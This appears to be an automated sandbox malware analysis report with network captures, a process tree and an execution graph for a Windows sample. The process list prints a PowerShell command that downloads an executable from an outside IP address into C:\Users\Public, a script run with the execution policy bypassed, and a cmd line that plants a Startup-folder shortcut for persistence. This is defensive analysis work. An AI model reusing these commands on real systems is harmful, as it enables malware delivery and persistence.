                                                          Dec 18, 2024 09:32:41.068388939 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.068579912 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.068620920 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.069598913 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.069747925 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.069797039 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:41.070846081 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.070982933 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:41.071024895 CET4973180192.168.2.4139.99.188.124
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 09:32:43.724416971 CET | 63119 | 53 | 192.168.2.4 | 1.1.1.1
Dec 18, 2024 09:32:43.863393068 CET | 53 | 63119 | 1.1.1.1 | 192.168.2.4
Dec 18, 2024 09:32:59.267842054 CET | 54275 | 53 | 192.168.2.4 | 1.1.1.1
Dec 18, 2024 09:32:59.405594110 CET | 53 | 54275 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 09:32:43.724416971 CET | 192.168.2.4 | 1.1.1.1 | 0x3b0e | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:32:59.267842054 CET | 192.168.2.4 | 1.1.1.1 | 0x9b80 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 09:32:43.863393068 CET | 1.1.1.1 | 192.168.2.4 | 0x3b0e | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:32:59.405594110 CET | 1.1.1.1 | 192.168.2.4 | 0x9b80 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
                                                          • 139.99.188.124
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 139.99.188.124 | 80 | 7544 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 09:32:32.931509972 CET | 164 | OUT | GET /aiSMo HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 139.99.188.124
                                                          Connection: Keep-Alive
Dec 18, 2024 09:32:34.390120029 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Wed, 18 Dec 2024 08:32:32 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                          Last-Modified: Fri, 06 Dec 2024 09:21:58 GMT
                                                          ETag: "da2a8-628968bf31962"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 893608
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 139.99.188.124 | 80 | 7760 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 09:32:37.486903906 CET | 74 | OUT | GET /ucZfzm.txt HTTP/1.1
                                                          Host: 139.99.188.124
                                                          Connection: Keep-Alive
Dec 18, 2024 09:32:38.999053955 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Wed, 18 Dec 2024 08:32:37 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                          Last-Modified: Fri, 06 Dec 2024 09:21:58 GMT
                                                          ETag: "130a62-628968bf2f250"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1247842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/plain



                                                          Target ID:0
                                                          Start time:03:32:30
                                                          Start date:18/12/2024
                                                          Path:C:\Users\user\Desktop\EO3RT0fEfb.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\EO3RT0fEfb.exe"
                                                          Imagebase:0x7ff75f140000
                                                          File size:1'083'904 bytes
                                                          MD5 hash:DC83439D47B35F0556BEEDBC95C57FC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:03:32:30
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe""
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:03:32:30
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:03:32:36
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:03:32:36
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:03:32:41
                                                          Start date:18/12/2024
                                                          Path:C:\Users\Public\Guard.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                          Imagebase:0xb00000
                                                          File size:893'608 bytes
                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:03:32:42
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:03:32:42
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:03:32:53
                                                          Start date:18/12/2024
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                          Imagebase:0x7ff7b7690000
                                                          File size:170'496 bytes
                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:03:32:53
                                                          Start date:18/12/2024
                                                          Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                          Imagebase:0x250000
                                                          File size:893'608 bytes
                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Has exited:false


                                                            Execution Graph

                                                            Execution Coverage:2.4%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:11%
                                                            Total number of Nodes:1418
                                                            Total number of Limit Nodes:40
7ff75f162130 45 API calls 94137->94149 94138 7ff75f151a30 45 API calls 94138->94149 94141 7ff75f19bfe4 94167 7ff75f1d93a4 77 API calls 94141->94167 94142 7ff75f151799 94150 7ff75f151815 94142->94150 94168 7ff75f1c34e4 77 API calls 3 library calls 94142->94168 94145 7ff75f153c20 300 API calls 94145->94149 94146 7ff75f14e0a8 4 API calls 94146->94149 94149->94126 94149->94137 94149->94138 94149->94141 94149->94142 94149->94145 94149->94146 94149->94150 94151 7ff75f14ef9c 46 API calls 94149->94151 94153 7ff75f1620d0 45 API calls 94149->94153 94154 7ff75f145af8 300 API calls 94149->94154 94155 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94149->94155 94156 7ff75f1635c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94149->94156 94157 7ff75f164f0c 34 API calls _onexit 94149->94157 94158 7ff75f1650b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94149->94158 94159 7ff75f1636c4 77 API calls 94149->94159 94160 7ff75f1637dc 300 API calls 94149->94160 94165 7ff75f14ee20 5 API calls Concurrency::wait 94149->94165 94166 7ff75f1aac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94149->94166 94150->94115 94151->94149 94152->94132 94153->94149 94154->94149 94156->94149 94157->94149 94159->94149 94160->94149 94161->94150 94162->94124 94163->94118 94164->94149 94165->94149 94166->94149 94167->94142 94168->94142 94169 7ff75f165328 94192 7ff75f164cac 94169->94192 94172 7ff75f165474 94223 7ff75f1657e4 7 API calls 2 library calls 94172->94223 94173 7ff75f165344 94175 7ff75f16547e 94173->94175 94177 7ff75f165362 94173->94177 94224 7ff75f1657e4 7 API calls 2 library calls 94175->94224 94178 7ff75f165387 94177->94178 94184 7ff75f1653a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 94177->94184 94198 7ff75f17ada4 94177->94198 94179 7ff75f165489 abort 94181 7ff75f16540d 94206 7ff75f165930 94181->94206 94183 
7ff75f165412 94209 7ff75f143730 94183->94209 94184->94181 94220 7ff75f169204 35 API calls __FrameHandler3::FrameUnwindToState 94184->94220 94189 7ff75f165435 94189->94179 94222 7ff75f164e90 8 API calls 2 library calls 94189->94222 94191 7ff75f16544c 94191->94178 94193 7ff75f164cce __scrt_initialize_crt 94192->94193 94225 7ff75f1665ec 94193->94225 94195 7ff75f164cd3 __scrt_initialize_crt 94196 7ff75f164cd7 94195->94196 94233 7ff75f166620 8 API calls 3 library calls 94195->94233 94196->94172 94196->94173 94199 7ff75f17ade0 94198->94199 94200 7ff75f17adff 94198->94200 94199->94200 94258 7ff75f141048 94199->94258 94263 7ff75f141080 94199->94263 94268 7ff75f141064 94199->94268 94273 7ff75f1410e8 94199->94273 94278 7ff75f16def8 94199->94278 94200->94184 94541 7ff75f166240 94206->94541 94210 7ff75f1437a3 94209->94210 94211 7ff75f143743 IsThemeActive 94209->94211 94221 7ff75f165974 GetModuleHandleW 94210->94221 94543 7ff75f1692d0 94211->94543 94217 7ff75f14377d 94555 7ff75f1437b0 94217->94555 94219 7ff75f143785 SystemParametersInfoW 94219->94210 94220->94181 94221->94189 94222->94191 94223->94175 94224->94179 94226 7ff75f1665f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 94225->94226 94234 7ff75f167290 94226->94234 94230 7ff75f16660c 94231 7ff75f166603 94230->94231 94241 7ff75f1672d8 DeleteCriticalSection 94230->94241 94231->94195 94233->94196 94235 7ff75f167298 94234->94235 94237 7ff75f1672c9 94235->94237 94238 7ff75f1665ff 94235->94238 94242 7ff75f167614 94235->94242 94247 7ff75f1672d8 DeleteCriticalSection 94237->94247 94238->94231 94240 7ff75f167218 8 API calls 3 library calls 94238->94240 94240->94230 94241->94231 94248 7ff75f167310 94242->94248 94245 7ff75f167654 94245->94235 94246 7ff75f16765f InitializeCriticalSectionAndSpinCount 94246->94245 94247->94238 94249 7ff75f167371 94248->94249 94256 7ff75f16736c try_get_function 94248->94256 94249->94245 94249->94246 94250 7ff75f167454 94250->94249 94253 7ff75f167462 GetProcAddress 94250->94253 94251 7ff75f1673a0 
LoadLibraryExW 94252 7ff75f1673c1 GetLastError 94251->94252 94251->94256 94252->94256 94254 7ff75f167473 94253->94254 94254->94249 94255 7ff75f167439 FreeLibrary 94255->94256 94256->94249 94256->94250 94256->94251 94256->94255 94257 7ff75f1673fb LoadLibraryExW 94256->94257 94257->94256 94287 7ff75f147718 94258->94287 94262 7ff75f164f15 94262->94199 94306 7ff75f147920 94263->94306 94265 7ff75f14109e 94336 7ff75f164ebc 34 API calls _onexit 94265->94336 94267 7ff75f164f15 94267->94199 94410 7ff75f147ec0 94268->94410 94270 7ff75f14106d 94446 7ff75f164ebc 34 API calls _onexit 94270->94446 94272 7ff75f164f15 94272->94199 94495 7ff75f161d80 94273->94495 94277 7ff75f164f15 94277->94199 94279 7ff75f16df03 94278->94279 94520 7ff75f17de20 94279->94520 94288 7ff75f149640 4 API calls 94287->94288 94289 7ff75f14778f 94288->94289 94295 7ff75f146f24 94289->94295 94292 7ff75f14782c 94293 7ff75f141051 94292->94293 94298 7ff75f147410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94292->94298 94294 7ff75f164ebc 34 API calls _onexit 94293->94294 94294->94262 94299 7ff75f146f60 94295->94299 94298->94292 94300 7ff75f146f52 94299->94300 94301 7ff75f146f85 94299->94301 94300->94292 94301->94300 94302 7ff75f146f93 RegOpenKeyExW 94301->94302 94302->94300 94303 7ff75f146faf RegQueryValueExW 94302->94303 94304 7ff75f146fdd 94303->94304 94305 7ff75f146ff5 RegCloseKey 94303->94305 94304->94305 94305->94300 94307 7ff75f147948 wcsftime 94306->94307 94308 7ff75f149640 4 API calls 94307->94308 94309 7ff75f147a02 94308->94309 94337 7ff75f145680 94309->94337 94311 7ff75f147a0c 94344 7ff75f163a38 94311->94344 94315 7ff75f147a2c 94360 7ff75f144680 94315->94360 94317 7ff75f147a3d 94318 7ff75f149640 4 API calls 94317->94318 94319 7ff75f147a47 94318->94319 94364 7ff75f14a854 94319->94364 94322 7ff75f18d05c RegQueryValueExW 94323 7ff75f18d08f 94322->94323 94324 7ff75f18d131 RegCloseKey 94322->94324 94325 7ff75f164c68 4 API calls 94323->94325 94326 7ff75f147a83 
Concurrency::wait 94324->94326 94334 7ff75f18d147 wcscat Concurrency::wait 94324->94334 94327 7ff75f18d0b2 94325->94327 94326->94265 94328 7ff75f18d0bf RegQueryValueExW 94327->94328 94329 7ff75f18d0f3 94328->94329 94331 7ff75f18d112 94328->94331 94368 7ff75f147cf4 94329->94368 94331->94324 94333 7ff75f144680 4 API calls 94333->94334 94334->94326 94334->94333 94335 7ff75f149d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94334->94335 94378 7ff75f14ec00 94334->94378 94335->94334 94336->94267 94383 7ff75f188f90 94337->94383 94340 7ff75f14ec00 4 API calls 94341 7ff75f1456b4 94340->94341 94385 7ff75f1456d4 94341->94385 94343 7ff75f1456c1 Concurrency::wait 94343->94311 94345 7ff75f188f90 wcsftime 94344->94345 94346 7ff75f163a44 GetFullPathNameW 94345->94346 94347 7ff75f163a74 94346->94347 94348 7ff75f147cf4 4 API calls 94347->94348 94349 7ff75f147a1b 94348->94349 94350 7ff75f1471f8 94349->94350 94351 7ff75f14721c 94350->94351 94354 7ff75f18cd0c 94350->94354 94352 7ff75f147274 94351->94352 94357 7ff75f18cd66 memcpy_s 94351->94357 94404 7ff75f14b960 94352->94404 94356 7ff75f164c68 4 API calls 94354->94356 94355 7ff75f147283 memcpy_s 94355->94315 94356->94357 94358 7ff75f164c68 4 API calls 94357->94358 94359 7ff75f18cdda memcpy_s 94358->94359 94361 7ff75f1446c8 memcpy_s 94360->94361 94362 7ff75f14469f 94360->94362 94361->94317 94363 7ff75f164c68 4 API calls 94362->94363 94363->94361 94365 7ff75f14a87a 94364->94365 94367 7ff75f147a51 RegOpenKeyExW 94364->94367 94366 7ff75f164c68 4 API calls 94365->94366 94366->94367 94367->94322 94367->94326 94369 7ff75f147d0d 94368->94369 94370 7ff75f18d2c8 94368->94370 94373 7ff75f147d24 94369->94373 94376 7ff75f147d51 94369->94376 94371 7ff75f14dda4 4 API calls 94370->94371 94372 7ff75f18d2d3 94371->94372 94409 7ff75f147e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94373->94409 94375 7ff75f147d2f memcpy_s 94375->94331 94376->94372 94377 7ff75f164c68 4 API calls 94376->94377 
94377->94375 94380 7ff75f14ec1d 94378->94380 94379 7ff75f19a5a2 94380->94379 94381 7ff75f164c68 4 API calls 94380->94381 94382 7ff75f14ec55 memcpy_s 94381->94382 94382->94334 94384 7ff75f14568c GetModuleFileNameW 94383->94384 94384->94340 94386 7ff75f188f90 wcsftime 94385->94386 94387 7ff75f1456e9 GetFullPathNameW 94386->94387 94388 7ff75f145712 94387->94388 94389 7ff75f18c03a 94387->94389 94391 7ff75f147cf4 4 API calls 94388->94391 94390 7ff75f14a854 4 API calls 94389->94390 94392 7ff75f14571c 94390->94392 94391->94392 94395 7ff75f14dda4 94392->94395 94394 7ff75f145785 94394->94343 94396 7ff75f14dda9 94395->94396 94398 7ff75f14ddc7 memcpy_s 94395->94398 94396->94398 94399 7ff75f14a7c0 94396->94399 94398->94394 94400 7ff75f14a7ed 94399->94400 94403 7ff75f14a7dd memcpy_s 94399->94403 94401 7ff75f18e7da 94400->94401 94402 7ff75f164c68 4 API calls 94400->94402 94402->94403 94403->94398 94405 7ff75f14b981 94404->94405 94408 7ff75f14b976 memcpy_s 94404->94408 94406 7ff75f18ef2a 94405->94406 94407 7ff75f164c68 4 API calls 94405->94407 94407->94408 94408->94355 94409->94375 94447 7ff75f1482b4 94410->94447 94413 7ff75f1482b4 4 API calls 94414 7ff75f147f3a 94413->94414 94415 7ff75f149640 4 API calls 94414->94415 94416 7ff75f147f46 94415->94416 94417 7ff75f147cf4 4 API calls 94416->94417 94418 7ff75f147f59 94417->94418 94454 7ff75f162d5c 6 API calls 94418->94454 94420 7ff75f147fa5 94421 7ff75f149640 4 API calls 94420->94421 94422 7ff75f147fb1 94421->94422 94423 7ff75f149640 4 API calls 94422->94423 94424 7ff75f147fbd 94423->94424 94425 7ff75f149640 4 API calls 94424->94425 94426 7ff75f147fc9 94425->94426 94427 7ff75f149640 4 API calls 94426->94427 94428 7ff75f14800f 94427->94428 94429 7ff75f149640 4 API calls 94428->94429 94430 7ff75f1480f7 94429->94430 94455 7ff75f15ef88 94430->94455 94432 7ff75f148103 94462 7ff75f15eec8 94432->94462 94434 7ff75f14812f 94435 7ff75f149640 4 API calls 94434->94435 94436 7ff75f14813b 94435->94436 94473 7ff75f156d40 94436->94473 94440 
7ff75f1481ac 94441 7ff75f1481be GetStdHandle 94440->94441 94442 7ff75f18d350 94441->94442 94443 7ff75f148220 OleInitialize 94441->94443 94490 7ff75f1bffc8 CreateThread 94442->94490 94443->94270 94445 7ff75f18d367 CloseHandle 94446->94272 94448 7ff75f149640 4 API calls 94447->94448 94449 7ff75f1482c6 94448->94449 94450 7ff75f149640 4 API calls 94449->94450 94451 7ff75f1482cf 94450->94451 94452 7ff75f149640 4 API calls 94451->94452 94453 7ff75f147f2e 94452->94453 94453->94413 94454->94420 94456 7ff75f149640 4 API calls 94455->94456 94457 7ff75f15efa3 94456->94457 94458 7ff75f149640 4 API calls 94457->94458 94459 7ff75f15efac 94458->94459 94460 7ff75f149640 4 API calls 94459->94460 94461 7ff75f15f02e 94460->94461 94461->94432 94463 7ff75f15eede 94462->94463 94464 7ff75f149640 4 API calls 94463->94464 94465 7ff75f15eeea 94464->94465 94466 7ff75f149640 4 API calls 94465->94466 94467 7ff75f15eef6 94466->94467 94468 7ff75f149640 4 API calls 94467->94468 94469 7ff75f15ef02 94468->94469 94470 7ff75f149640 4 API calls 94469->94470 94471 7ff75f15ef0e 94470->94471 94472 7ff75f15ef68 RegisterWindowMessageW 94471->94472 94472->94434 94474 7ff75f156db9 94473->94474 94475 7ff75f156d80 94473->94475 94491 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94474->94491 94476 7ff75f14816b 94475->94476 94492 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94475->94492 94483 7ff75f1639a8 94476->94483 94484 7ff75f1aa502 94483->94484 94489 7ff75f1639cc 94483->94489 94493 7ff75f14ee20 5 API calls Concurrency::wait 94484->94493 94486 7ff75f1aa50e 94494 7ff75f14ee20 5 API calls Concurrency::wait 94486->94494 94488 7ff75f1aa52d 94489->94440 94490->94445 94493->94486 94494->94488 94496 7ff75f149640 4 API calls 94495->94496 94497 7ff75f161db2 GetVersionExW 94496->94497 94498 7ff75f147cf4 4 API calls 94497->94498 94500 7ff75f161dfc 94498->94500 94499 
7ff75f14dda4 4 API calls 94499->94500 94500->94499 94501 7ff75f161e87 94500->94501 94502 7ff75f14dda4 4 API calls 94501->94502 94507 7ff75f161ea4 94502->94507 94503 7ff75f1a9645 94504 7ff75f1a964f 94503->94504 94518 7ff75f1b32f4 LoadLibraryA GetProcAddress 94504->94518 94505 7ff75f161f3c GetCurrentProcess IsWow64Process 94506 7ff75f161f7e memcpy_s 94505->94506 94506->94504 94509 7ff75f161f86 GetSystemInfo 94506->94509 94507->94503 94507->94505 94511 7ff75f1410f1 94509->94511 94510 7ff75f1a96b1 94512 7ff75f1a96b5 94510->94512 94513 7ff75f1a96d7 GetSystemInfo 94510->94513 94517 7ff75f164ebc 34 API calls _onexit 94511->94517 94519 7ff75f1b32f4 LoadLibraryA GetProcAddress 94512->94519 94516 7ff75f1a96bf 94513->94516 94515 7ff75f1a96f0 FreeLibrary 94515->94511 94516->94511 94516->94515 94517->94277 94518->94510 94519->94516 94539 7ff75f17b9bc EnterCriticalSection 94520->94539 94542 7ff75f165947 GetStartupInfoW 94541->94542 94542->94183 94601 7ff75f17b9bc EnterCriticalSection 94543->94601 94545 7ff75f1692e4 94546 7ff75f17ba10 _isindst LeaveCriticalSection 94545->94546 94547 7ff75f14376e 94546->94547 94548 7ff75f169334 94547->94548 94549 7ff75f16933d 94548->94549 94550 7ff75f143778 94548->94550 94602 7ff75f1755d4 15 API calls abort 94549->94602 94554 7ff75f1436e8 SystemParametersInfoW SystemParametersInfoW 94550->94554 94552 7ff75f169342 94603 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94552->94603 94554->94217 94556 7ff75f1437cd wcsftime 94555->94556 94557 7ff75f149640 4 API calls 94556->94557 94558 7ff75f1437dd GetCurrentDirectoryW 94557->94558 94604 7ff75f1457a0 94558->94604 94560 7ff75f143807 IsDebuggerPresent 94561 7ff75f18b872 MessageBoxA 94560->94561 94562 7ff75f143815 94560->94562 94563 7ff75f18b894 94561->94563 94562->94563 94564 7ff75f143839 94562->94564 94714 7ff75f14e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94563->94714 94678 7ff75f143f04 94564->94678 94568 7ff75f143860 GetFullPathNameW 94569 7ff75f147cf4 4 API 
calls 94568->94569 94570 7ff75f1438a6 94569->94570 94694 7ff75f143f9c 94570->94694 94571 7ff75f1438bf 94573 7ff75f18b8dc SetCurrentDirectoryW 94571->94573 94574 7ff75f1438c7 94571->94574 94573->94574 94575 7ff75f1438d0 94574->94575 94715 7ff75f1ad540 AllocateAndInitializeSid CheckTokenMembership FreeSid 94574->94715 94710 7ff75f143b84 7 API calls 94575->94710 94578 7ff75f18b8f8 94578->94575 94581 7ff75f18b90c 94578->94581 94583 7ff75f145680 6 API calls 94581->94583 94582 7ff75f1438da 94585 7ff75f146258 46 API calls 94582->94585 94587 7ff75f1438ef 94582->94587 94584 7ff75f18b916 94583->94584 94586 7ff75f14ec00 4 API calls 94584->94586 94585->94587 94588 7ff75f18b927 94586->94588 94589 7ff75f143913 94587->94589 94592 7ff75f145d88 Shell_NotifyIconW 94587->94592 94590 7ff75f18b930 94588->94590 94591 7ff75f18b94d 94588->94591 94593 7ff75f14391f SetCurrentDirectoryW 94589->94593 94594 7ff75f1471f8 4 API calls 94590->94594 94596 7ff75f1471f8 4 API calls 94591->94596 94592->94589 94595 7ff75f143934 Concurrency::wait 94593->94595 94597 7ff75f18b93c 94594->94597 94595->94219 94598 7ff75f18b963 GetForegroundWindow ShellExecuteW 94596->94598 94716 7ff75f147c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94597->94716 94600 7ff75f18b99f Concurrency::wait 94598->94600 94600->94589 94602->94552 94603->94550 94605 7ff75f149640 4 API calls 94604->94605 94606 7ff75f1457d7 94605->94606 94717 7ff75f149bbc 94606->94717 94608 7ff75f1457fe 94609 7ff75f145680 6 API calls 94608->94609 94610 7ff75f145812 94609->94610 94611 7ff75f14ec00 4 API calls 94610->94611 94612 7ff75f145823 94611->94612 94731 7ff75f146460 94612->94731 94615 7ff75f14584e Concurrency::wait 94620 7ff75f14e0a8 4 API calls 94615->94620 94616 7ff75f18c05e 94804 7ff75f1c2948 94616->94804 94618 7ff75f18c074 94619 7ff75f18c081 94618->94619 94621 7ff75f14652c 63 API calls 94618->94621 94822 7ff75f14652c 94619->94822 94622 7ff75f14586a 94620->94622 94621->94619 94624 7ff75f14ec00 4 
API calls 94622->94624 94625 7ff75f145888 94624->94625 94629 7ff75f18c099 94625->94629 94757 7ff75f14eff8 94625->94757 94627 7ff75f1458ad Concurrency::wait 94628 7ff75f14ec00 4 API calls 94627->94628 94630 7ff75f1458d7 94628->94630 94632 7ff75f145ab4 4 API calls 94629->94632 94630->94629 94631 7ff75f14eff8 46 API calls 94630->94631 94634 7ff75f1458fc Concurrency::wait 94631->94634 94633 7ff75f18c0e1 94632->94633 94635 7ff75f145ab4 4 API calls 94633->94635 94637 7ff75f149640 4 API calls 94634->94637 94636 7ff75f18c103 94635->94636 94640 7ff75f145680 6 API calls 94636->94640 94638 7ff75f14591f 94637->94638 94770 7ff75f145ab4 94638->94770 94643 7ff75f18c12b 94640->94643 94645 7ff75f145ab4 4 API calls 94643->94645 94644 7ff75f145941 94644->94629 94647 7ff75f145949 94644->94647 94646 7ff75f18c139 94645->94646 94648 7ff75f14e0a8 4 API calls 94646->94648 94649 7ff75f168e28 wcsftime 37 API calls 94647->94649 94650 7ff75f18c14a 94648->94650 94651 7ff75f145958 94649->94651 94652 7ff75f145ab4 4 API calls 94650->94652 94651->94633 94653 7ff75f145960 94651->94653 94654 7ff75f18c15b 94652->94654 94655 7ff75f168e28 wcsftime 37 API calls 94653->94655 94658 7ff75f14e0a8 4 API calls 94654->94658 94656 7ff75f14596f 94655->94656 94656->94636 94657 7ff75f145977 94656->94657 94659 7ff75f168e28 wcsftime 37 API calls 94657->94659 94660 7ff75f18c172 94658->94660 94661 7ff75f145986 94659->94661 94662 7ff75f145ab4 4 API calls 94660->94662 94663 7ff75f1459c6 94661->94663 94666 7ff75f145ab4 4 API calls 94661->94666 94665 7ff75f18c183 94662->94665 94663->94654 94664 7ff75f1459d3 